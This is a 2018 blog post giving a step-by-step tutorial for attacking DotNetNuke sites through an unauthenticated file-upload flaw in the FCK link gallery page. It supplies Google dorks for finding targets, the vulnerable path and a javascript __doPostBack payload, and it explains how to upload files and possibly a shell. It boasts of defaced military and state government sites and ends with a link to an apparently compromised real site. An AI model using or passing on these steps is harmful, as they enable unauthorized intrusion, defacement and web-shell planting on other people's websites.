Saturday, March 31, 2018

DNN Hacking


DNN Hacking





This BUG Discover by Pakistani Researchers
DNN(DotNetNuke) Collection All Edition Distant Computer file Publish without Authentication
Bug Found By WARRIOR

Over 10 military website and 20 state of United State of america Defaced by this bug Tongue
Find DNN path then go to this file


Code:
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
 
Select : File ( A File On Your Site )
after Loading then Put this Code instead URL

Code:
javascript:__doPostBack(ctlURL$cmdUpload,)
 
now you see Browse
select root folder and your file will upload to
site/dnn path/Portals/0

Note:you can only upload *. swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png, *.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.3gp, *.asf, *.asx, *.avi, *.flv, *.m4v, *.mov, *.mp4, *.mpe, *.mpeg, *.mpg, *.ram, *.rm, *.rmvb, *.wm, *.wmv, *.vob
by defualt but admin may change this and you will have a Shell 


Here is the way of hacking site by portal.....

Step 1 :

Code:
WwW.Google.CoM
 
Step 2:- Now enter this
Code:
:inurl:/tabid/36/language/en-US/Default.aspx
 
Code:
inurl:"portals/0/"
 
this is a dork to find the Portal Vulnerable sites, use it wisely

Step 3:- U will find many sites, Select the site which you are comfortable with.

Step 4:- For example take this site.



Step 5:
- Now replace

Code:
/Home/tabid/36/Language/en-US/Default.aspx
 
with

this

Code:
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
 
Step 6:- You will get a Link Gallary page.So far so good!

Step 7:
- Dont do anything for now, FINAL stage APPROACHING.

Step 8:-Now replace the URL in the address bar with a Simple Script


Code:
javascript:__doPostBack(ctlURL$cmdUpload,)
 
Step 9:-You will Find the Browse and Upload Option

Step 10:-Upload your package 

Step 11:-Go to http://www.site.com/potals0/YOUR.PAGE....

Congrats You just hacked a site..Tongue

Code:
http://www.essegielle.it/portals/0/2.swf


go to link download
download